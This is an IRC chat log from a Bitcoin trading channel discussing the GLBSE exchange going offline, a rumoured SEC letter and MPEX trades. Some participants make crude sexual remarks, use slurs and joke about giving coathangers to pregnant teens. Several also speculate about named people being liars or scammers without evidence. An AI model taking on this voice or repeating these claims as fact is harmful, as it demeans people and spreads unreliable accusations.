LOL'd at the patent reference. Oct 05 06:36:38 but i still think it was pure retardedness Oct 05 06:36:49 its idiotic Oct 05 06:37:01 hey noagendamarket, what's the confirm count on your oldest tx ? Oct 05 06:37:22 your mom Oct 05 06:37:24 http://pastebin.com/3ZXYMmwr Oct 05 06:37:26 no srsly. Oct 05 06:37:29 ^^ SEC Email Oct 05 06:38:48 [MPEX] [S.DICE] 3800 @ 0.00339998 = 12.9199 BTC [+] Oct 05 06:39:01 iirc danieldaniel made a phonecall to confirm it (that mustve been funny :D ) Oct 05 06:39:24 My current wallet.dat its only 139087 confirmations Oct 05 06:39:24 Aye, people are not complaining about if she has a good guess ratio. They complain about the fact she pass up unverified information as facts to push her guesses before the actual facts happen. It's like someone saying everytime "I saw that person murder someone" when it never happened and she just had a hunch about it and in her defense, claim to be right 90% of the time. Doesn't really Oct 05 06:39:24 excuse passing things as facts which are not. Oct 05 06:39:26 But really, the point is not there about if it ends up being true, it's that announcing things as facts before it happens seems to really hurt public opinion of MPEx. Oct 05 06:39:30 [MPEX] [S.MPOE] 23300 @ 0.00036002 = 8.3885 BTC [+] Oct 05 06:39:32 [MPEX] [S.MPOE] 10000 @ 0.0003646 = 3.646 BTC [+] Oct 05 06:39:33 [MPEX] [S.MPOE] 35310 @ 0.00036461 = 12.8744 BTC [+] Oct 05 06:39:33 MrTiggr multiple ppl did Oct 05 06:39:34 [MPEX] [S.MPOE] 41600 @ 0.00036547 = 15.2036 BTC [+] Oct 05 06:39:35 [MPEX] [S.MPOE] 11712 @ 0.00036748 = 4.3039 BTC [+] Oct 05 06:39:36 [MPEX] [S.MPOE] 64500 @ 0.00036749 = 23.7031 BTC [+] Oct 05 06:39:37 [MPEX] [S.MPOE] 19900 @ 0.00036838 = 7.3308 BTC [+] Oct 05 06:39:38 [MPEX] [S.MPOE] 51100 @ 0.00036839 = 18.8247 BTC [+] Oct 05 06:39:39 [MPEX] [S.MPOE] 26100 @ 0.00036848 = 9.6173 BTC [+] Oct 05 06:39:39 [MPEX] [S.MPOE] 33000 @ 0.00036849 = 12.1602 BTC [+] Oct 05 06:39:41 [MPEX] [S.MPOE] 38875 @ 0.00036978 = 14.3752 BTC [+] Oct 05 06:39:42 [MPEX] [S.MPOE] 31337 @ 0.00037009 = 11.5975 BTC [+] Oct 05 06:39:43 [MPEX] [S.MPOE] 13266 @ 0.00037034 = 4.9129 BTC [+] Oct 05 06:39:58 Hm, yea that email does have the ring of legitimacy to it. Oct 05 06:40:02 so wait, did nefario and glbse idssapear? Oct 05 06:40:04 dissapear ? Oct 05 06:40:11 BTC-Mining i guess... Oct 05 06:40:12 mircea_popescu: yeh i thought there was more than one .. i recall seeing dandan talking on irc at the same time thos; so i "witnessed" at least one phonecall Oct 05 06:40:15 Ukto kinda Oct 05 06:40:16 I mean, she could start the same accusations without passing things as facts and quoting instead and arguing why it looks shady and why she believes it's highly likely to be a scam or anything. Oct 05 06:40:22 "kinda" Oct 05 06:40:25 a5m0 abracadabra agath andrew_wmf area asa1024 assbot Azelphur Oct 05 06:40:25 Or rather, it lacks the obvious signs of inauthenticity commonly found in these things. Oct 05 06:40:28 it did or it didnt. speculation aside Oct 05 06:40:33 It would be a huge PR + for MPEx Oct 05 06:40:34 B0g4r7: there was a thread started by a guy who claimed to have claled the sec lawyer the letter came from, who asked him questions about GLBSE Oct 05 06:40:36 MrTiggr anyway, it's well established by now that its legit Oct 05 06:40:44 called the lawyer* Oct 05 06:40:47 I find she's not doing a good enough job for MPEx Oct 05 06:40:49 Ukto yes. Oct 05 06:40:55 i had a copy of the ermail with headers too ... SPF was all intact, everything checked out from a tch. standpoint Oct 05 06:41:14 BTC-Mining but i mean... so what are you saying, you want her job ? Oct 05 06:41:20 i did hear a rumor about SEC. but that doesnt seem plausable, as no actual us$ was involved, and it was in the UK Oct 05 06:41:30 if the sec sends me a letter Ill send them back a link to this http://www.youtube.com/watch?v=6wXkI4t7nuc Oct 05 06:41:34 lol Oct 05 06:41:34 Ukto the admin might have gotten a little paranoid. Oct 05 06:41:45 what, nefario? Oct 05 06:41:48 yes. Oct 05 06:41:49 hes IS paranoid Oct 05 06:41:53 but he would come and tell someone Oct 05 06:41:55 that its down for X Oct 05 06:42:08 i am not sure that nefario woudl run off with everyones btc Oct 05 06:42:11 which is why i said kinda. who the fuck knows what's going in their little rats nest by now. Oct 05 06:42:12 No he wont if hes following legal advice Oct 05 06:42:13 he IS paranoid tho, i give you that Oct 05 06:42:17 what about all teh idiotic shit he has done in the paste month makes you think that? Oct 05 06:42:20 he never clarified exactly what the beef was with goat Oct 05 06:42:27 and i don't believe either one of them, they're both lieing about it. Oct 05 06:42:40 (to some degree) Oct 05 06:43:07 Eh, not sure I would have the time. But at least if you found someone who would constructively argue instead of accusing by association. See, I don't go attacking you personally for what MPOE-PR do, I come to you and argue about why it seems like she's doing a bad job for MPEx and why I think you should held her accountable for what she do when acting as MPEx's public face. Oct 05 06:43:19 A google for that phone number turns some threads discussing it. Oct 05 06:43:22 anyoen talk to the other owners of glbse? Oct 05 06:43:27 negario was only 35% Oct 05 06:43:33 BTC-Mining the only thing you've not done yet is actually show me some serious issue there. Oct 05 06:43:35 lol negario Oct 05 06:43:37 lol negario Oct 05 06:43:42 What is the connection between theymos and glbse? Oct 05 06:43:43 whoops, did i say that Oct 05 06:43:44 :P Oct 05 06:43:46 so she said usagi was head of some comission, mk. Oct 05 06:43:56 B0g4r7 theymos owns ~25% of it Oct 05 06:43:57 LOL Negario Oct 05 06:44:08 thats like my usagio before Oct 05 06:44:08 which he was trying to divest, saturday. by monday nefario was fucking up the show. Oct 05 06:44:10 has theymos said anything ? Oct 05 06:44:15 Nefario doesnt have the numbers to do what hes doing Oct 05 06:44:20 Ukto so far he said he's pissed. Oct 05 06:44:23 about every other day Oct 05 06:44:24 He's said that he knows nothing. Oct 05 06:44:57 that too. Oct 05 06:44:58 The shareholders are in the dark here too Oct 05 06:45:11 noagendamarket you don't have shares do you ? Oct 05 06:45:15 I'm not holding out much hope of getting my 50 BTC back. Oct 05 06:45:26 I'd just deposited it yesterday. Not bought any securities yet, Oct 05 06:45:28 no comment ;0 Oct 05 06:45:35 yeah that cracked me up. theymos found out about glbse going offline on his forum Oct 05 06:45:37 o fuck, you're my missing 5% aren't you. duh Oct 05 06:45:59 never mind that theymos is a nearly 25% stakeholder in glbse Oct 05 06:46:12 you have any idea how long i've been trying to account for you! Oct 05 06:46:24 smickles thats correct Oct 05 06:46:45 never mind that nefario and theymos are fuckbuddies Oct 05 06:46:48 I wonder where the SEC got a list of addresses to email ppl, assuming the SEC thing is for real. Oct 05 06:47:10 B0g4r7 someone named names. Oct 05 06:47:11 You dont have to say anything to the SEC except fuuu Oct 05 06:47:14 then someone else would have gotten emails Oct 05 06:47:16 dub pics ? Oct 05 06:47:36 If like 1,000 ppl got it, I'm sure some responded. Oct 05 06:47:43 "waaah, I bought PPT and lost everything" Oct 05 06:47:46 etc Oct 05 06:47:57 i doubt more than ~50 or so were sent. Oct 05 06:48:33 B0g4r7: someone mentioned WOT Oct 05 06:48:41 well, it's odd that not all the asset issuers got the email, but then again, I don't know how the sec operates Oct 05 06:48:43 as source of emails Oct 05 06:48:46 yea, but we're pretty sure it's not the wot. Oct 05 06:48:52 wat is (was?) WOT? Oct 05 06:49:01 -otc web of trust Oct 05 06:49:03 bonks http://bitcoin-otc.com/viewratings.php Oct 05 06:49:04 ha Oct 05 06:49:07 the thing you're supposed to get into. Oct 05 06:49:09 ah Oct 05 06:49:12 it wasn't -otc/wot either Oct 05 06:49:13 yeah Oct 05 06:49:26 I dont recall who the other owner was, besides theymos Oct 05 06:49:32 they arent investigating glbse itself or theymos woulda got a letter Oct 05 06:49:33 I'll have to dig throgh my chats with nefario Oct 05 06:49:50 althoguh I do know one thig Oct 05 06:49:55 noagendamarket: would theymos say if he was contacted? Oct 05 06:50:02 Nefario did tell me he was living solely off of btc from glbse Oct 05 06:50:03 mircea_popescu: ? Oct 05 06:50:10 noagendamarket: I'm not sure we can assume that. Oct 05 06:50:44 if anyone is in danger its theymos since hes in the US Oct 05 06:50:45 bonks ? did i hilight you by mistake ? Oct 05 06:51:06 Ukto is that even possible ? it made so little... Oct 05 06:51:18 mircea yes it is Oct 05 06:51:24 jesus... Oct 05 06:51:29 mircea_popescu: k np Oct 05 06:51:36 mircea_popescu: not all of us live as well as you :p Oct 05 06:51:38 How unfortunate. Oct 05 06:51:46 I just wanted to buy some ASICMINER> Oct 05 06:51:50 smickles ya but i think it's under unemployment benefits Oct 05 06:51:53 now I can't (easily) Oct 05 06:52:15 B0g4r7 well if you buy 5k or w/e the person holds private books Oct 05 06:52:29 Yeah, the Board Member package. Oct 05 06:52:30 heh Oct 05 06:52:54 typically they dont go after investors at all. Oct 05 06:53:14 this is true. Oct 05 06:53:18 He's mentioned extending the private books offer to smaller investors. Guess I'll wait and see. Oct 05 06:53:34 they dont arrest you for investing in a nigerian scheme lol Oct 05 06:54:33 tho arguably they should. Oct 05 06:55:22 so if they don't go after investors, pirate is cool, right? Oct 05 06:55:52 :D Oct 05 06:55:55 first they need to legitimise bitcoin Oct 05 06:56:00 he was just some sorry bum who borrowed money to invest in zeek Oct 05 06:56:18 They need to keep their crooked fingers out of bitcoin. Oct 05 06:56:31 right Oct 05 06:56:36 we have enough crooked fingers already Oct 05 06:56:38 they need to deem it computer game money and ignore it Oct 05 06:56:47 ^^ Oct 05 06:56:51 Sounds good to me. Oct 05 06:56:59 the sec doesnt regulate wow Oct 05 06:57:06 indeed. Oct 05 06:57:07 lol copumkin Oct 05 06:57:32 or any other purely digital currency. Oct 05 06:57:39 copumpkin: only my thumbs are crooked, what fingers do you have covered? Oct 05 06:57:51 my middle finger Oct 05 06:57:59 sell;; popcorn Oct 05 06:58:09 If ppl want that kind of regulation, let them play in the classical markets. Oct 05 06:58:21 if i give a 'thumbs up" the tip of my thumb points backwards, otherwise, it looks 'normal' Oct 05 06:58:44 B0g4r7 people may want it till they're blue in the eyeballs. Oct 05 06:58:49 when you point your finger theres 3 fungers pointing at yourself lol Oct 05 06:58:50 btc will do what it does. Oct 05 07:00:08 it's not real money anyway unless it can play on a vegas craps table Oct 05 07:00:15 smickles s.dice! Oct 05 07:02:21 I should go there and call out 300 btc on a hard 12. see what happens Oct 05 07:03:26 p[robably get a better return than "ibnvesting" btc Oct 05 07:03:48 noagendamarket lemme point out smickles's fund made a solid 1200% over ~5 months Oct 05 07:04:00 .py (1/36.0)/(1/30.0) Oct 05 07:04:01 0.833333333333 Oct 05 07:04:10 noagendamarket: yeah Oct 05 07:05:04 mircea_popescu: well, if glbse doesn't come back, some of the investors will be f'd Oct 05 07:05:17 [MPEX] [S.MPOE] 20900 @ 0.00037034 = 7.7401 BTC [+] Oct 05 07:05:21 why ? btc sitting in their accts. Oct 05 07:05:25 not like it decays Oct 05 07:05:29 but well over 3/4 got out before glbse went down Oct 05 07:05:39 nick of time. Oct 05 07:05:47 there was a massive bank run lately Oct 05 07:06:13 mircea_popescu: if glbse doesn't come back that btc, or the shares that hadn't yet sold inot the final bidwall don't mean anything Oct 05 07:06:20 if you got out thank goat lol Oct 05 07:06:35 smickles you originally said "soon" is what i was answerting to :p Oct 05 07:06:39 *irony Oct 05 07:07:01 mircea_popescu: soon or some? Oct 05 07:07:04 I'm not counting on even getting my BTC back from my glbse account. Oct 05 07:07:56 o nm i misread :p Oct 05 07:07:57 B0g4r7: you're that pessimistic? Oct 05 07:08:07 Indeed. Oct 05 07:08:31 These things rarely have a happy ending in my experience. Oct 05 07:08:43 true Oct 05 07:08:44 B0g4r7 i imagine even if nefario turns a total ass and runs with the ppl's btc Oct 05 07:08:53 people will cover for it. it wasn't that much to begin with Oct 05 07:09:04 everyone is under arrest Oct 05 07:09:10 who would "people" be? Oct 05 07:09:11 line up against that wall over there Oct 05 07:09:11 jcpham urmom too ? Oct 05 07:09:22 prepare for the cavity search Oct 05 07:09:22 well, s2cm doesn't need any btc from glbse, just a list of the shareholders Oct 05 07:09:23 B0g4r7 im not gonna name names. but there's people. Oct 05 07:09:24 who would the people be that will cover? Oct 05 07:09:35 (and associated amoutns Oct 05 07:09:38 its not like the share creators can do it Oct 05 07:09:41 they dont know who has what Oct 05 07:09:46 I guess you mean the other glbse owners. Oct 05 07:10:01 I had no shares, just BTC. Oct 05 07:10:03 B0g4r7 ya something like that Oct 05 07:10:16 Had not yet purchased anything. Oct 05 07:10:31 got in at a good time i see :( Oct 05 07:10:55 i was reading the forum thread about allof this and then i got bored Oct 05 07:11:01 now i'm here Oct 05 07:11:08 Much like I got into trading classical stocks at a good time in 2008. Oct 05 07:11:19 [/sarc] Oct 05 07:11:37 B0g4r7 usagi is the master of it tho, with his 200 btc Oct 05 07:11:40 B0g4r7: well, if you'd've picked junk bonds, you'd've made a mint Oct 05 07:12:07 esp the good ones :p Oct 05 07:12:20 could have thrown a dart at a wall of stocks and shorted whatever hit for plenty of profit Oct 05 07:12:25 I have 200 of the finest btc to ever be mined Oct 05 07:12:38 and more at shit quality Oct 05 07:12:51 but i don't know how to tell the difference Oct 05 07:13:09 Ignatius-otc some have Oct 05 07:13:27 smickles i meant, good junk bonds :p Oct 05 07:14:06 Buying ops aplenty in '09. '08 was all downhill. Oct 05 07:14:21 mircea_popescu: oh sorry, i pulled a non-sequitur sort of topic change there Oct 05 07:15:47 Oh what luck, just one more buck, fortune left me by chance. Oct 05 07:16:29 i don't want to talk about how many coins i've mined Oct 05 07:16:35 versus how many i have Oct 05 07:17:06 jcpham why ? i'd like to rub it in Oct 05 07:17:09 it's how i make friends. Oct 05 07:17:23 true story Oct 05 07:17:28 certianly i've mined over 1000, maybe 1200 Oct 05 07:17:35 i posses maybe 5% Oct 05 07:17:45 that's funny, i mined 0. Oct 05 07:18:03 YEAH BUT YOU LIVE IN SOME CRAZY FAIRY TALE WORLD Oct 05 07:18:10 i guess so Oct 05 07:18:10 lol Oct 05 07:18:15 real people aren't as privileged as you Oct 05 07:18:22 you should feed poor people Oct 05 07:18:28 i've mined maybe 10 Oct 05 07:18:47 most of us plebians have to work Oct 05 07:19:04 don't tell him to feed poor people, hell asphixiate them with semen Oct 05 07:19:13 jcpham i feed poor people Oct 05 07:19:19 if they're female, under 30 and submissive. Oct 05 07:19:30 :l Oct 05 07:19:59 whaty Oct 05 07:20:04 what's ;l ? Oct 05 07:20:12 looks like mouth boner Oct 05 07:20:16 srsly lol Oct 05 07:20:21 i mean't it as licking my lips Oct 05 07:20:37 smickles o, cause i was gonna say MY HARD COCK!!!1111 ? Oct 05 07:20:40 wtf apostrophy Oct 05 07:20:42 lol Oct 05 07:20:42 *e Oct 05 07:21:05 i wouldn' judge you if it was some type of mouth boner Oct 05 07:21:28 Morocco blocked a Dutch "abortion ship" from entering one of its harbours on Thursday during a campaign group's first attempt to visit to a Muslim country to raise awareness about safe methods of abortion. Oct 05 07:21:29 true story. Oct 05 07:21:48 there are abortion ships? Oct 05 07:21:53 lol Oct 05 07:22:05 i wonder what they do with the babies while at sea Oct 05 07:22:19 there's a cruise line for everything Oct 05 07:22:42 thats a shitty love boat edition Oct 05 07:23:03 one of these days someone will stumble in this channel Oct 05 07:23:07 without a sense of humor Oct 05 07:23:10 the one with captain stbing and the coathanger Oct 05 07:23:29 it's liek rule 43, if you can think of it, carnival has a vacation package for it Oct 05 07:23:39 I wanted to make a black shirt, with a coat hanger on it, that says "Got Coathanger?" and goto one of the anti abortion rally's Oct 05 07:23:52 nooo Oct 05 07:24:08 put up a fold up table, giving away free coathangers to pregnant teens Oct 05 07:24:11 :P Oct 05 07:24:26 and a sign with an arrow "Follow these guys, heres your choice." Oct 05 07:24:58 Ukto: no, non-prego teen chicks, so they have unprotected sex, get prego, and then can use the hangar Oct 05 07:25:06 https://bitcointalk.org/index.php?topic=112438.msg1217338#msg1217338 I think that's the smartest thing I've ever seen Inaba say. Oct 05 07:25:17 o i gotta read this Oct 05 07:26:30 well Oct 05 07:26:33 at least pirate stuck around Oct 05 07:26:37 i give him a point for that Oct 05 07:26:44 nefario just disapears Oct 05 07:26:52 B0g4r7: thing is, they wouln't claw back btc, they'd claw back a btc equivilant amount of USD Oct 05 07:27:00 even when he had his extreme paranoia, he came and said he was working on shit Oct 05 07:27:32 has anyone tracked old payments back to the original wallet Oct 05 07:27:38 to see if its been emptied ? Oct 05 07:28:42 he emptied it by selling gpumax lol Oct 05 07:30:04 what? Oct 05 07:30:17 nefario has nothing to do with gpumax Oct 05 07:30:48 u sure bro? Oct 05 07:30:56 he didnt used to Oct 05 07:30:56 heh Oct 05 07:31:21 [MPEX] [S.MPOE] 5800 @ 0.00036789 = 2.1338 BTC [-] Oct 05 07:31:23 [MPEX] [S.MPOE] 45162 @ 0.00036751 = 16.5975 BTC [-] Oct 05 07:31:28 he jumped into the band wagon that gpumax was crap, and was the source of some shit before Oct 05 07:32:08 Hm, that's not a bad idea. Oct 05 07:35:01 [MPEX] [O.BTCUSD.P140T] 492 @ 0.25399152 = 124.9638 BTC [+] Oct 05 07:36:00 ;;ticker Oct 05 07:36:00 Best bid: 12.7, Best ask: 12.787, Bid-ask spread: 0.08700, Last trade: 12.67505, 24 hour volume: 39938, 24 hour low: 12.6, 24 hour high: 13.0899 Oct 05 07:36:34 .py 14-(.25*12.7) Oct 05 07:36:35 10.825 Oct 05 07:36:39 Looks like my BTC have indeed been moved out of the deposit address I sent them to at glbse, only a couple hours after I deposited them. Oct 05 07:36:44 I wonder if that's normal. Oct 05 07:37:19 prob into a cold wallet Oct 05 07:37:52 mircea_popescu: so what do you make of that P140T? Oct 05 07:37:57 its kinda pointless to specualte at this stage Oct 05 07:38:18 *speculate Oct 05 07:38:18 I suppose so. Oct 05 07:38:26 I should go to bed really. Oct 05 07:39:20 well then, check the wallet that the btc was moved out to Oct 05 07:39:31 smickles what ? Oct 05 07:40:03 mircea_popescu: that option went on the ticker and you did a ;;ticker, i thought they may be connected Oct 05 07:40:20 well yea, i was curious if btc suddenly dropped Oct 05 07:40:29 usually people buy calls when it pops and puts when it plumets Oct 05 07:40:34 sorta testing this teory Oct 05 07:41:19 Looks like it's all still there. My BTC was in the last sweep into that address. Oct 05 07:41:33 actually Oct 05 07:41:40 i know where all the bitcoins are! Oct 05 07:41:42 it may be possible that nefario is network less Oct 05 07:41:45 on the blockchain! Oct 05 07:41:59 he was using a cell phone for internet access Oct 05 07:41:59 to do work Oct 05 07:42:54 ;;bc,24hprc Oct 05 07:42:55 12.84 Oct 05 07:43:00 another good reason to check the cold wallet Oct 05 08:00:47 [MPEX] [S.MPOE] 4000 @ 0.00036795 = 1.4718 BTC [+] Oct 05 08:26:07 [MPEX] [S.MPOE] 13900 @ 0.00036795 = 5.1145 BTC [+] Oct 05 08:51:12 [MPEX] [S.MPOE] 900 @ 0.00036795 = 0.3312 BTC [+] Oct 05 08:55:25 mircea_popescu Oct 05 08:55:28 you still around? Oct 05 08:55:38 ya Oct 05 09:16:32 [MPEX] [S.MPOE] 4300 @ 0.00036904 = 1.5869 BTC [+] Oct 05 09:41:42 [MPEX] [S.MPOE] 1922 @ 0.00036795 = 0.7072 BTC [-] Oct 05 09:41:43 [MPEX] [S.MPOE] 838 @ 0.00036751 = 0.308 BTC [-] Oct 05 09:41:44 [MPEX] [S.MPOE] 11308 @ 0.00036609 = 4.1397 BTC [-] Oct 05 09:41:45 [MPEX] [S.MPOE] 24231 @ 0.0003652 = 8.8492 BTC [-] Oct 05 09:42:53 usagi: https://bitcointalk.org/index.php?topic=77469.msg1246778#msg1246778 Oct 05 09:42:59 Im going to bed, night all Oct 05 09:47:57 ;;tslb Oct 05 09:47:59 Time since last block: 18 minutes and 40 seconds Oct 05 09:49:57 i wonder what 50btc.com will do come december Oct 05 09:49:59 new domain ? Oct 05 10:02:09 [MPEX] [S.MPOE] 45500 @ 0.00036904 = 16.7913 BTC [+] Oct 05 10:02:10 [MPEX] [S.MPOE] 19434 @ 0.00037034 = 7.1972 BTC [+] Oct 05 10:02:12 [MPEX] [S.MPOE] 40200 @ 0.00037043 = 14.8913 BTC [+] Oct 05 10:02:13 [MPEX] [S.MPOE] 50100 @ 0.00037054 = 18.5641 BTC [+] Oct 05 10:02:14 [MPEX] [S.MPOE] 20001 @ 0.00037149 = 7.4302 BTC [+] Oct 05 10:02:14 [MPEX] [S.MPOE] 1853 @ 0.0003721 = 0.6895 BTC [+] Oct 05 10:02:15 [MPEX] [S.MPOE] 19980 @ 0.00037242 = 7.441 BTC [+] Oct 05 10:02:16 [MPEX] [S.MPOE] 3800 @ 0.00037278 = 1.4166 BTC [+] Oct 05 10:02:18 [MPEX] [S.MPOE] 19132 @ 0.00037398 = 7.155 BTC [+] Oct 05 10:03:20 [MPEX] [F.GIGA.ETF] 996 @ 0.00028006 = 0.2789 BTC [+] Oct 05 10:03:22 [MPEX] [F.GIGA.ETF] 12700 @ 0.00027682 = 3.5156 BTC [-] Oct 05 10:03:23 [MPEX] [F.GIGA.ETF] 14804 @ 0.00023469 = 3.4744 BTC [-] Oct 05 10:28:57 [MPEX] [S.MPOE] 7800 @ 0.00037094 = 2.8933 BTC [-] Oct 05 10:28:58 [MPEX] [S.MPOE] 36468 @ 0.00037398 = 13.6383 BTC [+] Oct 05 10:29:00 [MPEX] [S.MPOE] 2332 @ 0.00037408 = 0.8724 BTC [+] Oct 05 10:54:17 [MPEX] [S.BVPS] 539 @ 0.0035 = 1.8865 BTC [+] Oct 05 11:19:29 [MPEX] [S.MPOE] 24594 @ 0.00037012 = 9.1027 BTC [-] Oct 05 11:31:15 <___Atlas___> I always get out before shit happens. Oct 05 11:31:27 <___Atlas___> Man, I nearly missed Bitcoinica Oct 05 11:31:39 <___Atlas___> I nearly missed Pirate Oct 05 11:31:46 <___Atlas___> Same thing with Zipconf Oct 05 11:31:56 <___Atlas___> Got out just in time with coins in hand Oct 05 11:32:02 <___Atlas___> Now the same with GLBSE Oct 05 11:34:23 you sound so dissapointed ... perhaps its the other way around, ___Atlas___ .... perhaps you are like a bitcoin "typhoid Mary" :P Oct 05 11:44:36 [MPEX] [S.MPOE] 600 @ 0.00037012 = 0.2221 BTC [-] Oct 05 11:44:58 is there a write up of what is known re glbse? I have been out of the loop Oct 05 11:46:23 I was kind of expecting it tbh, either glbse to belly up or my portfolio to consist entirely of scammers Oct 05 11:46:56 but it is more entertaining than a night at a casino Oct 05 11:47:32 whereas I only have brazzers account Oct 05 12:09:51 [MPEX] [S.MPOE] 41106 @ 0.00037012 = 15.2142 BTC [-] Oct 05 12:09:52 [MPEX] [S.MPOE] 14894 @ 0.00037012 = 5.5126 BTC [-] Oct 05 12:14:55 fridge, i have read much of it and am none wiser... it's not like hollywood movie where they explain everything Oct 05 12:18:20 <___Atlas___> I've completely reformed the Bitcoin wikipedia article Oct 05 12:18:27 <___Atlas___> It's been quite a journey Oct 05 12:18:35 <___Atlas___> but we're going to get to featured article status eventually Oct 05 12:18:43 <___Atlas___> when that day happens Oct 05 12:18:50 <___Atlas___> Life will be complete Oct 05 12:26:06 wish I had your noble desires... Oct 05 12:26:27 here it's all carnal, like fucking and money Oct 05 12:28:24 lol .... makes me think futurama ...... Screw them all we'll make our own curreny with blackjack .. and hookers :D Oct 05 12:35:11 [MPEX] [S.MPOE] 6200 @ 0.00037375 = 2.3173 BTC [+] Oct 05 12:43:35 don't forget shit eating primates Oct 05 13:00:13 [MPEX] [S.MPOE] 35000 @ 0.00037375 = 13.0813 BTC [+] Oct 05 13:25:20 [MPEX] [S.MPOE] 25362 @ 0.00037175 = 9.4283 BTC [-] Oct 05 13:25:21 [MPEX] [S.MPOE] 24512 @ 0.00037375 = 9.1614 BTC [+] Oct 05 13:31:57 looks like the new Master Of Hyperbole is DiabloD3 :) Oct 05 13:32:16 "A software update for the launch of GLBSE 3.0 is plausible.... just so is the SEC extraditing him from the UK to stand trial in the US." Oct 05 13:32:18 LOL Oct 05 13:34:01 heh Oct 05 13:43:34 so it's still down huh Oct 05 13:44:26 so it seems. didnt check tho Oct 05 13:44:51 drekk just going by the lack of trades Oct 05 13:45:01 yea Oct 05 13:45:25 did you notice an impact on mpex trading volume since glbse is down? Oct 05 13:45:59 ya, it lost maybe 3-5% Oct 05 13:46:10 really? interesting Oct 05 13:46:12 30day Total Volume 87`868.82731082 BTC Oct 05 13:46:20 was ~9xk last week Oct 05 13:46:36 so ppl really are scared :D Oct 05 13:46:56 possibly\ Oct 05 13:47:29 crazy stuff. can't read the forum anymore. all trolling and FUD and whining Oct 05 13:49:39 How many scam accusations do the forum mods need to tag someone? Usai looks like the most popular candidate for a tag but nothing has happened Oct 05 13:50:17 3 separate accusations Oct 05 13:51:05 i don't think it goes by count Oct 05 13:51:09 [MPEX] [S.MPOE] 788 @ 0.00037375 = 0.2945 BTC [+] Oct 05 13:51:10 [MPEX] [S.MPOE] 22612 @ 0.00037408 = 8.4587 BTC [+] Oct 05 13:51:44 mircea_popescu: none of those are bull shit and all are verified fuck ups Oct 05 13:51:57 femtotube even so. Oct 05 13:52:23 scammer has to collect more money and then run? :) Oct 05 13:53:10 then and only then, the not so bright overlords can tag Oct 05 13:53:52 i think idiocy is an absolute defense. sorta like verity in calumny proceedings Oct 05 13:54:16 LOL Oct 05 13:54:35 it's a forum. not a trading platform. what do you expect? Oct 05 13:54:54 "oops, I am an idiot stealing all the coin. Sorry! Se you all next time" ? Oct 05 13:55:16 "did you scam these people ?" "no, i'm just stupid" "a ok then, move along" Oct 05 13:55:23 this defence probably works in BTC forum :) Oct 05 13:55:28 heh Oct 05 13:56:13 "i really made a good faith attempt at investing despite the fact that i lack any experience whatsoever, training no matter how informal or even enough common sense to notice a problem with any of this." Oct 05 13:57:57 "...also I got a free rifle at my bank for opening a new account. FREE RIFLE!!!" Oct 05 14:16:42 [MPEX] [S.MPOE] 60989 @ 0.00037189 = 22.6812 BTC [-] Oct 05 14:16:43 [MPEX] [S.MPOE] 6111 @ 0.00037103 = 2.2674 BTC [-] Oct 05 14:42:14 [MPEX] [S.MPOE] 48700 @ 0.00037166 = 18.0998 BTC [+] Oct 05 14:49:37 [MPEX] [F.GIGA.ETF] 7000 @ 0.0002777 = 1.9439 BTC [+] Oct 05 14:50:59 [MPEX] [S.MPOE] 2000 @ 0.00037408 = 0.7482 BTC [+] Oct 05 14:57:36 glbse up Oct 05 14:57:40 ? Oct 05 14:58:42 nop Oct 05 15:00:16 <___Atlas___> Well, it was fun while it lasted Oct 05 15:00:29 <___Atlas___> It will be remembered in the footnotes of virtual history Oct 05 15:00:44 <___Atlas___> Right next to second life stocks and other ponzi schemes Oct 05 15:01:32 <___Atlas___> http://www.youtube.com/watch?v=Wn_iz8z2AGw Oct 05 15:02:11 ___Atlas___ whatcher on about Oct 05 15:02:19 o, glbbq Oct 05 15:03:05 <___Atlas___> Hopefully you guys don't have your money seized by the London police Oct 05 15:03:18 <___Atlas___> and then see it spent on the Queen's LSD habit Oct 05 15:03:41 <___Atlas___> I mean, it is in royal law: All property is of her majesty, the Queen. Oct 05 15:03:42 <___Atlas___> SOL Oct 05 15:03:58 http://www.youtube.com/watch?v=b9DMiy_DVok&feature=related Oct 05 15:05:29 <___Atlas___> Saw that on the news when that happened Oct 05 15:05:33 <___Atlas___> Sad stuff Oct 05 15:05:50 ;;web fetch http://glbse.com Oct 05 15:05:51 "\n\n

GLBSE is offline

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For those worried about their bitcoin, please calm yourselves there has been no hack and your coins are safe and all accounted for.

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I apologize for the lack of notice and the downtime, but there isn't much choice. We will update our users on Saturday.

\n\n\n" Oct 05 15:06:32 <___Atlas___> Not if the Queen has her say. Oct 05 15:14:42 <___Atlas___> http://www.youtube.com/watch?v=AwziS2aE6Ww Oct 05 15:15:45 <___Atlas___> God save our gracious Queen Oct 05 15:15:51 <___Atlas___> Long live our noble Queen Oct 05 15:16:01 <___Atlas___> May she hold GLBSE's securities in mercy Oct 05 15:16:02 [MPEX] [F.GIGA.ETF] 519 @ 0.0002777 = 0.1441 BTC [+] Oct 05 15:16:04 [MPEX] [F.GIGA.ETF] 5800 @ 0.0002777 = 1.6107 BTC [+] Oct 05 15:16:08 <___Atlas___> and save our precious Bitcoins Oct 05 15:16:12 <___Atlas___> in mercy Oct 05 15:19:50 <___Atlas___> Lucidize: How does it feel knowing the Queen of England has your coins now? Oct 05 15:21:11 oh what lol? Oct 05 15:21:30 <___Atlas___> The Queen owns GLBSE now. It's her property. Oct 05 15:21:34 <___Atlas___> She seized it. Oct 05 15:22:03 It doesn't sound true to me =) Oct 05 15:22:21 my money is on "nefario had paranoid fit" Oct 05 15:22:45 never ascribe to nefarious agencies that which can be adequately explained by nefario's stupidity. Oct 05 15:22:54 moo Oct 05 15:33:30 <___Atlas___> By any measure of sovereignty, Britain is still a monarchy. Oct 05 15:33:44 <___Atlas___> The Queen can do whatever she wants without any police intervention Oct 05 15:40:10 yes the queen of england shut down glbse Oct 05 15:40:42 true story, she told me at dinner Oct 05 15:41:11 [MPEX] [S.MPOE] 16800 @ 0.00037245 = 6.2572 BTC [-] Oct 05 15:41:12 [MPEX] [S.MPOE] 10300 @ 0.00037195 = 3.8311 BTC [-] Oct 05 15:41:13 [MPEX] [S.MPOE] 30300 @ 0.00037158 = 11.2589 BTC [-] Oct 05 15:41:15 with the wording, I'm kinda hoping it's a major security vulnerability that needed to be fixed Oct 05 15:41:27 or some other technical issue Oct 05 15:43:23 <___Atlas___> http://en.wikipedia.org/wiki/Autism_Kroner Oct 05 15:44:00 not really Oct 05 15:44:06 she lays down no law Oct 05 15:44:14 she is here just for tourists Oct 05 15:44:57 ___Atlas___ "to reach consensus in a network of computing power that validates the transactions" Oct 05 15:45:01 wtf is that english ? Oct 05 15:45:05 <___Atlas___> http://en.wikipedia.org/wiki/Sovereign_immunity#United_Kingdom 